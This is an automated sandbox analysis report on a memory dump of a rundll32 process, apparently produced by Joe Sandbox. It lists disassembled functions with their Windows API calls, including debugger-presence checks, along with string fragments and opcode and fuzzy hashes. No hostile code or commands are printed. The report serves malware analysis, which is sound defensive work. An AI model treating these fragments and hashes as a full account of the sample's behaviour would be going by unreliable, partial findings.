Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseCreateErrorHandleLastMutex
String ID: *$9mD$B$u${
API String ID: 4294037311-4130828584
Opcode ID: a3dc5d81476e21c5553a27a9510cefeea035ff1e4a1cbfcfcef27ce6c025f35b
Instruction ID: 60ff8785ce5d39f9c67de8b12376612fa94597d5f7fc2946c6711787a0d6eadf
Opcode Fuzzy Hash: a3dc5d81476e21c5553a27a9510cefeea035ff1e4a1cbfcfcef27ce6c025f35b
Instruction Fuzzy Hash: 4AF17CB9C04658CEDB14CFAAC8817ADBBF5BB49304F2089AAD449BB364D3344A81CF55

Function 7EE5CAF0 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 289
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 7EE5CCEE

Strings

e, xrefs: 7EE5CC0B
2, xrefs: 7EE5CAFB
), xrefs: 7EE5CBCF
m, xrefs: 7EE5CC15
?, xrefs: 7EE5CCD1
n , xrefs: 7EE5CB0E

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID: DirectorySystem
String ID: )$2$?$m$n $e
API String ID: 2188284642-1749247282
Opcode ID: d9be62a65ae59754ad454d0b33c0dcda3e019b03fab2acdcd8c303e30683b515
Instruction ID: 8a5e69d6fe6fb375002dd1862cbc462e075cae34450711be73af6ef0a2968911
Opcode Fuzzy Hash: d9be62a65ae59754ad454d0b33c0dcda3e019b03fab2acdcd8c303e30683b515
Instruction Fuzzy Hash: 2AF148B9D042A88BDB24CF66C8947ADBBF5BF49300F2088DAD049BB364D7741A80CF55

Function 7EE49280 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 204
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetShellWindow.USER32 ref: 7EE49497

Strings

2, xrefs: 7EE4945E
MNo name attribute , xrefs: 7EE492FF
c, xrefs: 7EE492F7
\, xrefs: 7EE4933A
Q, xrefs: 7EE49294

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID: ShellWindow
String ID: 2$MNo name attribute $Q$\$c
API String ID: 2831631499-3960561890
Opcode ID: a74a8f3600b50ce0ca07bf3b6244d9fcb3c93939e6c95eb5e3e434cc363c0117
Instruction ID: e6a9af5e057934bc2dd9ca9b04ab1acb1c15e0ef2076a9b9fcf9ddaaba1d90b4
Opcode Fuzzy Hash: a74a8f3600b50ce0ca07bf3b6244d9fcb3c93939e6c95eb5e3e434cc363c0117
Instruction Fuzzy Hash: 1DA139B9D04299CEDB14CFAAC48079DBBF5BF49304F20859AD448BB355D3744A84CF5A

Non-executed Functions

Function 7EE7C640 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1436COMMONLIBRARYCODE

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 7EE7C824

Strings

1#IND, xrefs: 7EE7C745
1#SNAN, xrefs: 7EE7C74C
1#QNAN, xrefs: 7EE7C753
1#INF, xrefs: 7EE7C776

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 4bd2dbdd3991cd8dbfdaafce0f2b55574898e112d9aaeecd80bb83c6066f05b6
Instruction ID: b0ac88ac15086e5d341d90fc04f0647623ddfd817c7923b7548a8c1601b9cc69
Opcode Fuzzy Hash: 4bd2dbdd3991cd8dbfdaafce0f2b55574898e112d9aaeecd80bb83c6066f05b6
Instruction Fuzzy Hash: 61D25975E182298FDB65CE28CD407DAB7B9FB49314F1449EAD84EE7240E734AE818F40

Function 7EE7AA7C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,7EE7AD9A,00000002,00000000,?,?,?,7EE7AD9A,?,00000000), ref: 7EE7AB15
GetLocaleInfoW.KERNEL32(?,20001004,7EE7AD9A,00000002,00000000,?,?,?,7EE7AD9A,?,00000000), ref: 7EE7AB3E
GetACP.KERNEL32(?,?,7EE7AD9A,?,00000000), ref: 7EE7AB53

Strings

ACP, xrefs: 7EE7AA9A
OCP, xrefs: 7EE7AAD0

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 63fe599944ddb31abaa7591ef465118fd1f4913e45bb017e9382bc5523db7b0e
Instruction ID: 15e0c66c2e469a8878a55162e2177e1f260b65d2174bef2a7cf938a43298f89b
Opcode Fuzzy Hash: 63fe599944ddb31abaa7591ef465118fd1f4913e45bb017e9382bc5523db7b0e
Instruction Fuzzy Hash: 9921B02A620105AAE7268F25CE01B8777B7FF44A98B568C24E94FDB108F732D941C360

Function 7EE7AC51 Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 7EE71EEC: GetLastError.KERNEL32(?,00000008,7EE7699C), ref: 7EE71EF0
Part of subcall function 7EE71EEC: SetLastError.KERNEL32(00000000,00000000,0000000B,000000FF), ref: 7EE71F92

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 7EE7AD5D
IsValidCodePage.KERNEL32(00000000), ref: 7EE7ADA6
IsValidLocale.KERNEL32(?,00000001), ref: 7EE7ADB5
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 7EE7ADFD
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 7EE7AE1C

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: fcae90dd2a8d7127ce76efbbddcb1cb9443db7686b426362feaf9bcd06c2843a
Instruction ID: b8bb639bd5f52384a3bf0a9070f4aff13d64fed7c1c369b27eb4b1c10b37f933
Opcode Fuzzy Hash: fcae90dd2a8d7127ce76efbbddcb1cb9443db7686b426362feaf9bcd06c2843a
Instruction Fuzzy Hash: 0051717AA10206AFDF00DFA5CD50BBF77B9BF08709F104D69EA1AEB150E77099448B61

Function 7EE7A2ED Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 251COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 7EE71EEC: GetLastError.KERNEL32(?,00000008,7EE7699C), ref: 7EE71EF0
Part of subcall function 7EE71EEC: SetLastError.KERNEL32(00000000,00000000,0000000B,000000FF), ref: 7EE71F92

GetACP.KERNEL32(?,?,?,?,?,?,7EE72932,?,?,?,00000055,?,-00000050,?,?,00000001), ref: 7EE7A3AE
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,7EE72932,?,?,?,00000055,?,-00000050,?,?), ref: 7EE7A3D9
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 7EE7A53C

Strings

utf8, xrefs: 7EE7A4AB

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID: ErrorLast$CodeInfoLocalePageValid
String ID: utf8
API String ID: 607553120-905460609
Opcode ID: f00dc09187059ccf116ab1a9ca26c06b722108cf978903910c549f331c56ad96
Instruction ID: b5c65df02ed0ce3ffdfc042d3c652ec40a2d758ecfa7b04bc9075d4abd1f4494
Opcode Fuzzy Hash: f00dc09187059ccf116ab1a9ca26c06b722108cf978903910c549f331c56ad96
Instruction Fuzzy Hash: C1711539625306AAEB15DF75CC45BAA73BDEF04304F104D69EA0EDB180FB75E9808760

Function 7EE74EFE Relevance: 6.3, APIs: 4, Instructions: 337COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 7EE74F8B

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 30751736de5bae8b5dd7a50bf91012a2f7c7320bebe9c7af6a7a9e7fe88613c8
Instruction ID: 5dda9502dd0d02d3327f167e51a6820fa572cc8e92d31bcf56e31d57b8ccea6c
Opcode Fuzzy Hash: 30751736de5bae8b5dd7a50bf91012a2f7c7320bebe9c7af6a7a9e7fe88613c8
Instruction Fuzzy Hash: FCB17D3AD152869FDB06CF68C8807EEBBF6EF45314F154D6AD805AB344D3359905CBA0

Function 7EE61417 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,00000000), ref: 7EE61423
IsDebuggerPresent.KERNEL32 ref: 7EE614EF
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 7EE61508
UnhandledExceptionFilter.KERNEL32(?), ref: 7EE61512

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 66804877d74f9032da37ca0f964c8ff1ef423dd893cce8b78e15c5ebc187adea
Instruction ID: 3fcb6f932b3c904650c0443565acef6ba262449d0abd737d2f529bfbd2541b2f
Opcode Fuzzy Hash: 66804877d74f9032da37ca0f964c8ff1ef423dd893cce8b78e15c5ebc187adea
Instruction Fuzzy Hash: 7E312A79C052189BDB21DFA1C9497CDBBB8AF08304F1045EAE40DAB240EB709B84CF45

Function 7EE3DAC0 Relevance: 5.5, Strings: 3, Instructions: 1787COMMON

Download Yara Rule

Strings

<, xrefs: 7EE3F282
`, xrefs: 7EE3FA3B
@, xrefs: 7EE3F28C

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: <$@$`
API String ID: 0-4173208228
Opcode ID: 0099691eb4be6a9e6605c4af32d09f3bc3b4bc1066700c1b028f064fdd672c39
Instruction ID: 4b8491d9c9d2eb9ce5dbba1f1d37f3ce99bdd2e281d51a0481c979785b5e4db1
Opcode Fuzzy Hash: 0099691eb4be6a9e6605c4af32d09f3bc3b4bc1066700c1b028f064fdd672c39
Instruction Fuzzy Hash: 69338DB8E052698FCB69CF19C990BD9BBB1BF89304F1085DAD849A7355D730AE81CF44

Function 7EE38E10 Relevance: 5.1, Strings: 3, Instructions: 1362COMMON

Download Yara Rule

Strings

e, xrefs: 7EE39FAC
e, xrefs: 7EE3A4E8
0~, xrefs: 7EE3A7C8, 7EE3A074, 7EE39B65, 7EE3915C

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: e$e$0~
API String ID: 0-952297885
Opcode ID: ae0993437fd3aefb5b2b0fa88c51e6baa65db45f5ef998e4f634bcad2ada6167
Instruction ID: 7396328144d429c6e49315e0ab89667175caae4184dc9746ce70966e2bce3857
Opcode Fuzzy Hash: ae0993437fd3aefb5b2b0fa88c51e6baa65db45f5ef998e4f634bcad2ada6167
Instruction Fuzzy Hash: E8039DB8E052698FCB69CF58C990BD9BBB1BF89304F1081DAD849A7345D731AE81CF54

Function 7EE7A700 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 7EE71EEC: GetLastError.KERNEL32(?,00000008,7EE7699C), ref: 7EE71EF0
Part of subcall function 7EE71EEC: SetLastError.KERNEL32(00000000,00000000,0000000B,000000FF), ref: 7EE71F92

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 7EE7A754
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 7EE7A79E
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 7EE7A864

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID: InfoLocale$ErrorLast
String ID:
API String ID: 661929714-0
Opcode ID: f383ae9a2863f33739cc656a92e25b2bd01b7e72471aa1adb1612db05bef5f45
Instruction ID: d7e19f4e724231e04536acf5dd467280e17de37607f3da6c9a8a41d1aad55ccb
Opcode Fuzzy Hash: f383ae9a2863f33739cc656a92e25b2bd01b7e72471aa1adb1612db05bef5f45
Instruction Fuzzy Hash: 4161D1799252179FEB19CF28CD85BAA77B9FF04304F10487AEC1AC6188E734D991CB50

Function 7EE652A3 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 7EE6539B
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 7EE653A5
UnhandledExceptionFilter.KERNEL32(7EE84F78,?,?,?,?,?,00000000), ref: 7EE653B2

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 6ecdc7ab7fba994929fa2757b8506c41e06226324bba47f40909d0122e57616f
Instruction ID: a6922666b06330afd056517b6f8da7a2bb563d73b3145b1e2b5da859e9dbf736
Opcode Fuzzy Hash: 6ecdc7ab7fba994929fa2757b8506c41e06226324bba47f40909d0122e57616f
Instruction Fuzzy Hash: 1F31C5799513289BCB21DF64D88879DBBB8BF08310F5059EAE40DA7290E7709B85CF45

Function 7EE28F30 Relevance: 4.3, Strings: 3, Instructions: 553COMMON

Download Yara Rule

Strings

PE, xrefs: 7EE28FB2
@, xrefs: 7EE28FEE
@, xrefs: 7EE29294

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: @$@$PE
API String ID: 0-2458287169
Opcode ID: edc081acf4b778692fdc18be92724da21dfa7da1bdb1f6dd02c32c1083faaa5f
Instruction ID: ac03e3dab1735962968a5b45c4d5a4513883f3c85471847c4d8343ccccad5ecb
Opcode Fuzzy Hash: edc081acf4b778692fdc18be92724da21dfa7da1bdb1f6dd02c32c1083faaa5f
Instruction Fuzzy Hash: 7D52B278E01669CFDB24CF99C990BDDBBB6BF48304F1085A9D809AB345D731AA85CF50

Function 7EE3FD40 Relevance: 4.2, Strings: 2, Instructions: 1746COMMON

Download Yara Rule

Strings

D, xrefs: 7EE3FDF2
|J, xrefs: 7EE41D5D

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: |J$D
API String ID: 0-12622807
Opcode ID: 84c7aea5c86ec4b9db25fce991208014a7c23a2498f343b01edfed61524be3e8
Instruction ID: 0f8e2ea49d87089d3ff3eff7afd13b60f2685fd80308b8e4343d29e6ce9b02c5
Opcode Fuzzy Hash: 84c7aea5c86ec4b9db25fce991208014a7c23a2498f343b01edfed61524be3e8
Instruction Fuzzy Hash: 77238DB8E052698FCB65CF19C890BDDBBB1BF89304F1085EAD849A7355D730AA81CF54

Function 7EE41EB0 Relevance: 3.9, Strings: 2, Instructions: 1432COMMON

Download Yara Rule

Strings

D, xrefs: 7EE41EE8
|J, xrefs: 7EE43873

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: |J$D
API String ID: 0-12622807
Opcode ID: 1dece8f21955bee52fe5e93da095ce06b31ddafdc74711db6e96690535fe5adb
Instruction ID: ac0a089fe77af8c3874c315ccf92f577974056eb3b85c9ac675418e8d5389530
Opcode Fuzzy Hash: 1dece8f21955bee52fe5e93da095ce06b31ddafdc74711db6e96690535fe5adb
Instruction Fuzzy Hash: 4E03ACB8E052698FCB69CF59C890BDDBBB1BF89304F1081DAD849A7355D730AA81CF54

Function 7EE3A800 Relevance: 3.9, Strings: 2, Instructions: 1361COMMON

Download Yara Rule

Strings

D, xrefs: 7EE3A84B
|J, xrefs: 7EE3BFF2

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID: _memcpy_s
String ID: |J$D
API String ID: 2001391462-12622807
Opcode ID: f448fb46316b92cf44fb05f7f18570fbd8cd8fb48b0a4fc5484d145897851bb4
Instruction ID: 060d149f38880290fa255a6ff20298059304c1a1b3fdf33e1c510a184f9f4a6e
Opcode Fuzzy Hash: f448fb46316b92cf44fb05f7f18570fbd8cd8fb48b0a4fc5484d145897851bb4
Instruction Fuzzy Hash: ED03ADB8E052698BCB65CF58C890BDDBBB1BF89304F1085DAD849A7355D730AE81CF54

Function 7EE68490 Relevance: 3.4, APIs: 2, Instructions: 449COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7af5a88747a61b5c2432c45f089c59faf2ec72d18a3311d2486f70010d347518
Instruction ID: 260efff2e355874cc39fae81a6ff325d5a0641b4e606f8fcf45717d227dd1353
Opcode Fuzzy Hash: 7af5a88747a61b5c2432c45f089c59faf2ec72d18a3311d2486f70010d347518
Instruction Fuzzy Hash: 12F17075E50219DFDF14CFA8D99069DB7B2FF88328F158669D81AEB384D730A901CB84

Function 7EE4D3E0 Relevance: 3.3, Strings: 2, Instructions: 765COMMON

Download Yara Rule

Strings

, xrefs: 7EE4D46E
\ ~, xrefs: 7EE4DAB1, 7EE4DABA, 7EE4DAE5, 7EE4DB86

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: $\ ~
API String ID: 0-3152225205
Opcode ID: 10874122cb3ce8d9b48b35c15a9e55088f6850d5a8ddcf22bd14b9139e9664b3
Instruction ID: a68b7c23110c4387d6decb2da333fe566269975fe5b3dafe7ebdb737f157c1a3
Opcode Fuzzy Hash: 10874122cb3ce8d9b48b35c15a9e55088f6850d5a8ddcf22bd14b9139e9664b3
Instruction Fuzzy Hash: 10A2AB78E052698FCB69CF58C894BDDBBB2BF89304F1081DAD849A7355D730AA81CF50

Function 7EE57D90 Relevance: 3.1, Strings: 2, Instructions: 625COMMON

Download Yara Rule

Strings

|J, xrefs: 7EE58733
D, xrefs: 7EE57E3B

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: |J$D
API String ID: 0-12622807
Opcode ID: 202ef1ed96acd5e29430df7316c3343e8f2f58075dbfb217fd56d7b6576cd545
Instruction ID: 994d77a3aec770aba2dcf6da06ebb631c843342d4fc6a2861cfbd352fadf6b2f
Opcode Fuzzy Hash: 202ef1ed96acd5e29430df7316c3343e8f2f58075dbfb217fd56d7b6576cd545
Instruction Fuzzy Hash: E0729B78E052698FDB69CF58C990BDDBBB1BF49304F1081EAD849AB345D730AA81CF54

Function 7EE58870 Relevance: 3.1, Strings: 2, Instructions: 625COMMON

Download Yara Rule

Strings

D, xrefs: 7EE5891B
|J, xrefs: 7EE59213

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: |J$D
API String ID: 0-12622807
Opcode ID: 62d01fea67e05151b7f21388409965331ce15c64298cfc16368527263ff00b49
Instruction ID: 74d9e5e49d90e2e768b3a6b0ae96ccd00f8275a6d2ab824e2b9171becae582d3
Opcode Fuzzy Hash: 62d01fea67e05151b7f21388409965331ce15c64298cfc16368527263ff00b49
Instruction Fuzzy Hash: 2B729C78E052698FDB64CF58C890BDDBBB1BF49304F1081EAD859AB345D730AA85CF54

Function 7EE4A560 Relevance: 3.0, Strings: 2, Instructions: 500COMMON

Download Yara Rule

Strings

\ ~, xrefs: 7EE4AB3A, 7EE4AB43, 7EE4AB65, 7EE4ABE2
N/A, xrefs: 7EE4A7CA, 7EE4A81D

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID: __aullrem
String ID: N/A$\ ~
API String ID: 3758378126-4231089902
Opcode ID: 020e641d6804f881b522e3d7fa8804c4c54a25bd6a97169da35f40073ed57910
Instruction ID: 72ba19e5e3b6cf7e898bb8f0f4838ec7f0e893cdd35a222d406f847fe9759e6c
Opcode Fuzzy Hash: 020e641d6804f881b522e3d7fa8804c4c54a25bd6a97169da35f40073ed57910
Instruction Fuzzy Hash: A1529E78E052688FDB65CF99C990BDDBBB2BF89304F1085DAD849A7345D730AA81CF50

Function 7EE3A0A4 Relevance: 2.7, Strings: 2, Instructions: 215COMMON

Download Yara Rule

Strings

e, xrefs: 7EE3A4E8
0~, xrefs: 7EE3A7C8

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: e$0~
API String ID: 0-640262345
Opcode ID: 02352f8507a17d444bbdf42c5d579d86689da7911503822574f87064fd18f9e1
Instruction ID: 85de2fcad919897fb8745cfdbb1f861617ffd3b4f1ef89604bb319d4c7c6a69c
Opcode Fuzzy Hash: 02352f8507a17d444bbdf42c5d579d86689da7911503822574f87064fd18f9e1
Instruction Fuzzy Hash: 08C160B8E052698FCB64CF58C990B9DFBB1BF88304F6481D9D949A7346D730AA81CF54

Function 7EE4C170 Relevance: 2.7, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

\ ~, xrefs: 7EE4C221, 7EE4C24B, 7EE4C26D, 7EE4C2CC, 7EE4C2D8
N/A, xrefs: 7EE4C349, 7EE4C396

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: N/A$\ ~
API String ID: 0-4231089902
Opcode ID: 898e182baceac9e5bc2a84a63ed67538ce64c79758dc72afb0ab304c5df44e6b
Instruction ID: 96e785d128b21f681ac0b241fb8cc8034a5765725cf480893faeab382dbc15d5
Opcode Fuzzy Hash: 898e182baceac9e5bc2a84a63ed67538ce64c79758dc72afb0ab304c5df44e6b
Instruction Fuzzy Hash: 29A1D278E04258DFDB14CF99D890AEDFBB2BF89304F248599E859A7315D730AA81CF50

Function 7EE49A90 Relevance: 2.7, Strings: 2, Instructions: 184COMMON

Download Yara Rule

Strings

\ ~, xrefs: 7EE49B2E, 7EE49B58, 7EE49B7A, 7EE49BD9, 7EE49BE5
N/A, xrefs: 7EE49C50, 7EE49C97

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: N/A$\ ~
API String ID: 0-4231089902
Opcode ID: fc6644d72a155f5232214c80326cf581c917cd9a7e004b1576396fd952e9a05a
Instruction ID: f9ebf3eb009b837df86ab5cb9a6c10307aa777a3846c1bcb7968cf263f9f8edb
Opcode Fuzzy Hash: fc6644d72a155f5232214c80326cf581c917cd9a7e004b1576396fd952e9a05a
Instruction Fuzzy Hash: CFA1CD78E042598FCB14CF99D990ADDFBB2BF89304F20859AE859BB305D731AA41CF54

Function 7EE3C160 Relevance: 2.6, Strings: 1, Instructions: 1355COMMON

Download Yara Rule

Strings

|J, xrefs: 7EE3D972

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: |J
API String ID: 0-1146653492
Opcode ID: 843441e68a1b5d61336327ce5d3d7311c44f03430d04dac1ba4082c8c3148d19
Instruction ID: f0c0b7180f7979ce0b678b7dc09aaeb1d849e22b58f22f778671509d27ec83b2
Opcode Fuzzy Hash: 843441e68a1b5d61336327ce5d3d7311c44f03430d04dac1ba4082c8c3148d19
Instruction Fuzzy Hash: 1403ADB8E052698FCB65CF58C890BDDBBB1BF89304F1085DAD849A7355DB30AA81CF54

Function 7EE47B7B Relevance: 1.9, Strings: 1, Instructions: 602COMMON

Download Yara Rule

Strings

", xrefs: 7EE48457

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: dea0c735356d3f33a1567506055c43ad9b578f0eb21d85d5e0ab084e230f6366
Instruction ID: e836550441483559e0d11204159ed8548d07744036af1318c24cfccf439ee299
Opcode Fuzzy Hash: dea0c735356d3f33a1567506055c43ad9b578f0eb21d85d5e0ab084e230f6366
Instruction Fuzzy Hash: AC524474D09298DFCB14DFA8C994BDEBBB1AF49304F2089D8E449A7245DB306B84DF91

Function 7EE7160D Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,7EE71608,?,?,00000008,?,?,7EE80B55,00000000), ref: 7EE7183A

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 058ae5f31e7cfff285d16005cee7caa7a80f622fbc20ad0f9d410325722491c2
Instruction ID: f6182bbae53b2556b1538b1157e6277c23a6d75bce26fea34efdbe3993bd7bc9
